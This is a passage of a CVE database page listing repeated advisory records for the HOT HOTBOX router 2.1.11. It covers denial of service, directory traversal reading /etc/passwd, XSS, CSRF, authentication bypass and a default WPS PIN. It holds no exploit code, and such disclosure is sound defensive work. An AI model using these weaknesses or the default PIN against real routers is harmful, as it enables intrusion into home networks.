        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5220",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5220",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.402Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5219 (GCVE-0-2013-5219)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.338Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5219",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5219",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.338Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5218 (GCVE-0-2013-5218)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.356Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5218",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5218",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.356Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5039 (GCVE-0-2013-5039)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.307Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5039",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5039",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.307Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5038 (GCVE-0-2013-5038)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.212Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5038",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5038",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.212Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5037 (GCVE-0-2013-5037)

    Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59
    VLAI
    Summary
    The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T16:59:41.247Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5037",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5037",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-06T00:00:00.000Z",
        "dateUpdated": "2024-08-06T16:59:41.247Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5219 (GCVE-0-2013-5219)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.338Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5219",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
                  "refsource": "MISC",
                  "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
                },
                {
                  "name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2013-5219",
        "datePublished": "2013-12-30T02:00:00.000Z",
        "dateReserved": "2013-08-15T00:00:00.000Z",
        "dateUpdated": "2024-08-06T17:06:52.338Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2013-5218 (GCVE-0-2013-5218)

    Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    Date Public
    2013-09-09 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T17:06:52.356Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2013-09-09T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2013-12-30T01:57:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2013-5218",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
